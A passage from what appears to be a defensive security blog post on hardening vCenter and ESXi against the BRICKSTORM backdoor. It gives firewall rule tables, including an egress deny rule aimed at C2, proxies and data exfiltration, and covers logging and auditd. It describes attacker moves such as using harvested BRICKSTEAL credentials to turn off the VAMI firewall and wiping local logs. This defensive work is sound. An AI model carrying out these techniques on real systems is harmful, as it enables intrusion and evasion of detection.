solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DENY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Block Internal Scanning. Prevents VCSA-to-Internal pivots.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Internet (ANY)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ANY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">DENY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Suppresses C2. Blocks DoH, SOCKS proxies, and data exfiltration.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Egress filtering</span></div></div> <div class="block-paragraph_advanced"><p><strong style="vertical-align: baseline;">Note on Micro-Segmentation:</strong><span style="vertical-align: baseline;"> While physical firewalls secure the management plane (North-South), VMware NSX Distributed Firewall (DFW) is the required standard for controlling guest-to-guest (East-West) traffic. Where applicable, NSX should be used to protect the data plane, while physical network hardware remains the control of the management plane</span><span style="vertical-align: baseline;">.</span></p> <h4><span style="vertical-align: baseline;">Host-Based Firewalls for VCSA and ESXi</span></h4> <p><span style="vertical-align: baseline;">Host-based firewalls should be used in tandem with network-based firewalls to achieve a resilient defense-in-depth posture. While network firewalls effectively manage "North-South" traffic (entering/leaving the subnet), they are blind to "East-West" traffic within the same VLAN. Host-based firewalls are capable of blocking an attacker sitting on the same network segment. By enforcing security at the individual endpoint, organizations can ensure that the access path does not grant logical authority over the vSphere control plane.</span></p> <h4><span style="vertical-align: baseline;">The VCSA Host-Based Firewall (Photon OS)</span></h4> <p><span style="vertical-align: baseline;">Managed via the Virtual Appliance Management Interface (VAMI), the VCSA firewall is a native control to prevent lateral movement from compromised "trusted" entities such as backup servers or monitoring devices that share the management VLAN. The firewall should be used as a primary layer of defense to enforce the "principle of least privilege" at the host network level.</span></p> <p><strong style="vertical-align: baseline;">Strategic Implementation: </strong><span style="vertical-align: baseline;">The default policy should be transitioned to "Default Deny." You should explicitly define authorized IP addresses for every management service.</span></p> <h5><span style="vertical-align: baseline;">Recommended VCSA Host-Based Firewall Scoping</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Port</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Protocol </strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Source</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Detail</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">UI / API</strong><span style="vertical-align: baseline;"> (443)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PAW IP + Backup IP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Restricts vSphere Client access to hardened Admin stations.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VAMI</strong><span style="vertical-align: baseline;"> (5480)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PAW IP Only</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Prevents unauthorized SSH enablement or log tampering.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SSH</strong><span style="vertical-align: baseline;"> (22)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PAW IP Only</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Eliminates the primary shell residency path.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Heartbeat</strong><span style="vertical-align: baseline;"> (902)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ESXi Management Subnet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Required for continuous Host-to-vCenter synchronization.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Internal</strong><span style="vertical-align: baseline;"> (LADB)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Localhost (127.0.0.1)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Protects local inter-process communication.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ANY / ANY</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ANY</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">DENY ALL</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Blocks all unauthorized internal discovery.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">VCSA host-based firewall</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Limitations of the VAMI GUI Firewall</span></h4> <p><span style="vertical-align: baseline;">While the host-based firewall in the VCSA is a mandatory component of a defense-in-depth strategy, administrators should recognize that the standard VAMI GUI has the following operational limitations for defending against threat actors:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Lack of Port-Specific Granularity:</strong><span style="vertical-align: baseline;">The </span><a href="https://knowledge.broadcom.com/external/article/377036/how-to-block-all-traffic-on-vcenter-exce.html" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VAMI GUI</span></a><span style="vertical-align: baseline;"> lacks the precision required for a True Zero Trust model. In all versions, creating an IP-based rule for a specific server (e.g., a virtual backup server) forces an "all-or-nothing" approach. To grant that server legitimate access to the vSphere API on </span><strong style="vertical-align: baseline;">TCP 443</strong><span style="vertical-align: baseline;">, the administrator is often forced to trust that IP for </span><span style="font-style: italic; vertical-align: baseline;">all</span><span style="vertical-align: baseline;"> ports.<br/><br/></span><strong style="vertical-align: baseline;">The Risk:</strong><span style="vertical-align: baseline;"> This simultaneously grants the backup server unauthorized access to highly sensitive management interfaces like </span><strong style="vertical-align: baseline;">SSH (22)</strong><span style="vertical-align: baseline;"> and the </span><strong style="vertical-align: baseline;">VAMI (5480)</strong><span style="vertical-align: baseline;">. If an attacker compromises the backup server, they inherit an unobstructed management path to the VCSA shell. </span></p> </li> </ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Circular Administrative Dependency:</strong><span style="vertical-align: baseline;">A fundamental weakness of the native vCenter host-based firewall is its logical placement within the management plane it is intended to secure. The firewall is managed via the VAMI, which represents a secondary management entry point residing on TCP port 5480. This interface is logically adjacent to the standard vSphere Client (TCP port 443) and is frequently exposed across the same management network segments.<br/><br/></span><strong style="vertical-align: baseline;">The Risk:</strong><span style="vertical-align: baseline;"> Credentials captured via </span><code style="vertical-align: baseline;">BRICKSTEAL</code><span style="vertical-align: baseline;"> grant a threat actor authority to reconfigure the appliance itself. By pivoting to the VAMI, the actor can use their compromised role to deactivate the firewall. This circular dependency ensures the firewall is managed by the very application it is intended to protect, allowing a threat actor to disable controls using the system's own management tools.</span></p> </li> </ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Forensic Visibility Gaps:</strong><span style="vertical-align: baseline;">The standard VAMI firewall is designed for connectivity management, not security monitoring. It does not generate remote logs for denied connection attempts or specific shell activity.<br/><br/></span><strong style="vertical-align: baseline;">The Risk:</strong><span style="vertical-align: baseline;"> This blinds security teams to active lateral movement. A threat actor can scan the VCSA from an unauthorized VM multiple times or use a VCSA shell unmonitored; because the firewall does not notify when it blocks a connection and shell commands are not logged, the SOC remains unaware of the intrusion attempt until the final stage of the attack.</span></p> </li> </ul> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Inbound-Only Policy Visibility Gaps:</strong><span style="vertical-align: baseline;">The GUI focuses primarily only on inbound traffic, leaving the Outbound (Egress) policy unmanaged.<br/><br/></span><strong style="vertical-align: baseline;">The Risk:</strong><span style="vertical-align: baseline;"> Modern malware, such as the </span><code style="vertical-align: baseline;">BRICKSTORM</code><span style="vertical-align: baseline;"> backdoor, relies on outbound "Phone Home" (C2) traffic to receive commands. A firewall that does not restrict outbound traffic allows a compromised VCSA to communicate with external malicious infrastructure without restriction.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">To overcome these limitations of the native VAMI firewall, organizations are recommended to consider the transition from native vSphere GUI-based management to OS-level hardening using the underlying Photon Linux iptables or nftables.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Tamper-Proof Integrity:</strong><span style="vertical-align: baseline;"> By implementing granular firewall rules directly at the Photon Linux operating system level, the controls become independent of vCenter application permissions. Even a compromised vCenter Administrator cannot disable Photon OS-level rules via the VCSA GUI.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Granular Logic:</strong><span style="vertical-align: baseline;"> OS-level rules allow for strict "Source IP + Destination Port" mapping, ensuring a backup server only sees port 443 and is rejected on all others.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Transformation into a Sensor:</strong><span style="vertical-align: baseline;"> Unlike the VCSA GUI, Photon OS-level logging can be "bridged" to a security information and event management (SIEM) which transforms every denied connection attempt into a high-fidelity, early-warning alert.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The VAMI GUI firewall should be viewed as a basic security control, not a comprehensive Tier-0 security control. To effectively mitigate the attack vectors required for advanced campaigns, organizations should bypass the vulnerable GUI and enforce a strictly validated, granular, and logged firewall policy at the VCSA Photon Linux kernel level.</span></p></div> <div class="block-aside"><dl> <dt>aside_block</dt> <dd>&lt;ListValue: [StructValue([(&#x27;title&#x27;, &#x27;vCenter Hardening Script&#x27;), (&#x27;body&#x27;, &lt;wagtail.rich_text.RichText object at 0x7fa46c392970&gt;), (&#x27;btn_text&#x27;, &#x27;Get the tool!&#x27;), (&#x27;href&#x27;, &#x27;https://github.com/mandiant/vcsa-hardening-tool&#x27;), (&#x27;image&#x27;, None)])]&gt;</dd> </dl></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">The ESXi Hypervisor Firewall</span></h4> <p><span style="vertical-align: baseline;">The ESXi firewall is a stateful packet filter sitting between the VMkernel and the network. Restricting individual services to authorized management IPs is the only way to block an attacker on the same VLAN from reaching the host API or SSH port.</span></p> <p><strong style="vertical-align: baseline;">Strategic Implementation:</strong><span style="vertical-align: baseline;"> Access should be restricted at the service level by deselecting "Allow connections from any IP address" and entering specific management IPs.</span></p> <h5><span style="vertical-align: baseline;">Recommended ESXi Host-Based Firewall Rules</span></h5></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Service Category</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Service Name</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Port / Protocol</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Authorized Source</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Strategic Defensive Value</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Management Access</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SSH Server, vSphere Web Client/Access</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">22, 443 / TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PAW Subnet / IPs only</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ensures shell and GUI access is restricted to hardened admin PAWs.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">vCenter Control Plane</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vCenter Agent (vpxa), Update Manager</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">902, 80 / TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA IP Only</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Prevents unauthorized entities from impersonating the VCSA.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Intra-Cluster</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">vMotion, HA, Fault Tolerance, DVSSync</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8000, 8182 / TCP, 12345 / UDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">ESXi Mgmt Subnet / IPs</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Prevents interception of unencrypted RAM data and heartbeat tampering.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Storage</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">NFC (File Copy), HBR (Replication)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">902, 31031 / TCP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">VCSA IP + Cluster IPs</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Prevents unauthorized VMDK extraction or out-of-band data cloning.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Telemetry</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Syslog, SNMP, NTP, DNS</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">514, 161, 123, 53 / UDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SIEM &amp; Infra Subnets</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ensures telemetry and core services are bound to verified internal providers.</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Legacy / High Risk</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CIM Server, SLP (Discovery)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5988, 5989 / TCP, 427 / UDP</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">EXPLICIT DENY / Monitoring IP</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Neutralizes RCE vectors targeting the primary attack surface used for ESXi-specific ransomware (</span><a href="https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/23599" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">VMSA-2021-0002</span></a><span style="vertical-align: baseline;">).</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">ESXi host-based firewall</span></div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Hardening as a Detection Enabler </span></h4> <p><span style="vertical-align: baseline;">When the infrastructure is configured with a "Default Deny" posture, it creates the friction necessary to expose a threat actor. In an unhardened environment, an attacker's port scan or lateral movement attempt is silent and successful; in a hardened environment, those same actions become indicators of compromise.</span></p> <h5><span style="vertical-align: baseline;">The Multi-Layered Signal Chain</span></h5> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Network-Level Visibility: D</strong><span style="vertical-align: baseline;">etection begins at the transit layer. Organizations should ensure that logging is enabled at the physical network and virtual switch (VDS) levels. This allows the SOC to track the "path" of a threat actor, identifying unauthorized scanning or connection attempts as they traverse subnets toward the vSphere management plane.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Host-Based Firewall Logging (IPtables): </strong><span style="vertical-align: baseline;">While the VCSA provides a management GUI for its firewall, it does not natively log denied access. To transform the appliance into a sensor, host-based firewall logging is strictly dependent on a custom OS-level IPtables configuration. By adding a logging target to the underlying Photon OS kernel, every rejected packet is recorded, providing the proof that an unauthorized threat actor is attempting to access the VCSA.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Immutable Logging:</strong><span style="vertical-align: baseline;"> By enabling Remote Syslog Forwarding, these rejection logs are offloaded instantly. Even if an attacker eventually compromises the host, they cannot delete the local log sources.</span></p> </li> </ul> <h5><span style="vertical-align: baseline;">Early Detection Signals</span></h5> <p><span style="vertical-align: baseline;">By correlating the denied access with identity-based events, organizations can identify a pattern of a </span><code style="vertical-align: baseline;">BRICKSTORM</code><span style="vertical-align: baseline;"> lifecycle event in its earliest stages:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Failed Authentication Alerts:</strong><span style="vertical-align: baseline;"> A log entry in the standard auth.log (for SSH) or a vCenter UserLoginSessionEvent showing a "Failed Login Attempt" from an unauthorized internal IP is a high-value alert.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Account Lockout Events:</strong><span style="vertical-align: baseline;"> When an actor attempts to brute-force or use harvested credentials against local "break-glass" accounts (like administrator@vsphere.local), the resulting "Account Locked" event provides a high-priority signal that a targeted credential attack is in progress.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Behavioral Pattern Correlation:</strong><span style="vertical-align: baseline;"> The most powerful signal occurs when the SIEM correlates these disparate sources. For example, a Firewall Drop (via IPtables) followed immediately by a Failed Login (via SSO) from the same source IP is a high-confidence indicator of an active intrusion attempt.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">Network segmentation at the switch level is a prerequisite, but host-based firewalls are the primary enforcement point of a vSphere Zero Trust architecture. By complementing network-based firewalls with host-level filtering, organizations can eliminate the visibility gap on the management VLAN and transform the VCSA and ESXi hosts into sensors capable of exposing an adversary at the earliest stage of an intrusion.</span></p> <h3><span style="vertical-align: baseline;">Phase 4: Logging and Forensic Visibility</span></h3> <p><span style="vertical-align: baseline;">To facilitate the detection within the vSphere control plane, organizations should achieve comprehensive telemetry across the previously unmonitored layers of the underlying VCSA operating system.</span></p> <p><span style="vertical-align: baseline;">The primary operational advantage exploited in this campaign is the lack of visibility inherent in the virtualization control plane. This monitoring visibility gap is driven by three critical factors:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Logging Gap:</strong><span style="vertical-align: baseline;"> By default, VCSA does not forward kernel-level audit logs. If an attacker wipes the local disk, the evidence of their residency is permanently erased.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">The Restricted Logging Pipeline: </strong><span style="vertical-align: baseline;">Standard modern log forwarding agents such as Fluentd or Logstash are not supported for installation on the VCSA. To maintain appliance integrity, defenders are restricted to using the native rsyslog daemon. This prevents on-host log enrichment or advanced parsing, forcing the SIEM to process raw, legacy data streams. This technical complexity often leads to critical kernel-level signals being misclassified or ignored.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><strong style="vertical-align: baseline;">Operational Telemetry Fragmentation:</strong><span style="vertical-align: baseline;"> Security indicators are frequently buried within standard cluster and application level events. As detailed in the </span><a href="https://github.com/lamw/vcenter-event-mapping" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">vCenter Event Mapping</span></a><span style="vertical-align: baseline;">, critical actions like </span><code style="vertical-align: baseline;">VmNetworkAdapterAddedEvent</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">VmClonedEvent</code><span style="vertical-align: baseline;"> are logged as routine infrastructure management tasks. Because these signals are operational rather than security-focused, a threat actor's movements are easily disguised as routine tasks.</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1" style="border-collapse: collapse; width: 99.9641%;"> <tbody> <tr> <td style="width: 98.1839%;"> <p><span style="font-style: italic; vertical-align: baseline;">Securing the VCSA requires a transition from passive cluster monitoring to active OS-level hardening, utilizing a 'Default Deny' posture to eliminate the network path often exploited during advanced campaigns. This architectural shift transforms the appliance into a proactive security sensor, where the friction of blocked network activity and initial access serves as a high-fidelity indicator. By moving beyond complex vSphere application telemetry, organizations can generate the precise early warning signals needed to expose a BRICKSTORM intruder at the very moment they attempt unauthorized discovery.</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">What is auditd?</span></h4> <p><span style="vertical-align: baseline;">The Linux Audit Daemon (auditd) is the kernel's primary subsystem for tracking security-relevant events. Unlike standard "system logs" (which record application and management events), auditd records system calls. It sees exactly what commands were executed in the shell, which files were modified, and which users escalated privileges. The default Photon auditd rules cover Identity (useradd/del) and privilege escalation (sudo/privileged).</span></p> <h4><span style="vertical-align: baseline;">auditd Status: Verifying the Current Defensive Posture</span></h4> <p><span style="vertical-align: baseline;">auditd is the core forensic foundation for detecting low-level movements. While VCSA Photon logs provide visibility into management tasks, they are fundamentally </span><span style="vertical-align: baseline;">blind to the "living-off-the-land" (LotL) techniques that define this campaign. This threat actor operates deep within the VCSA shell to execute binary injections, modify startup scripts using </span><code style="vertical-align: baseline;">sed</code><span style="vertical-align: baseline;">, and utilize </span><code style="vertical-align: baseline;">sudo</code><span style="vertical-align: baseline;"> to fuel the </span><code style="vertical-align: baseline;">BRICKSTEAL</code><span style="vertical-align: baseline;"> credential harvester. Only auditd, by recording the underlying system calls (</span><code style="vertical-align: baseline;">syscalls</code><span style="vertical-align: baseline;">), provides a </span><span style="vertical-align: baseline;">granular record of these command-line maneuvers. In an environment where traditional EDR is absent, auditd captures the minute behavioral patterns that standard logs ignore.</span></p> <h4><span style="vertical-align: baseline;">The Default Configuration Gap</span></h4> <p><span style="vertical-align: baseline;">Modern VCSAs (vSphere 7 and 8) ship with a pre-configured set of STIG rules (located in </span><code style="vertical-align: 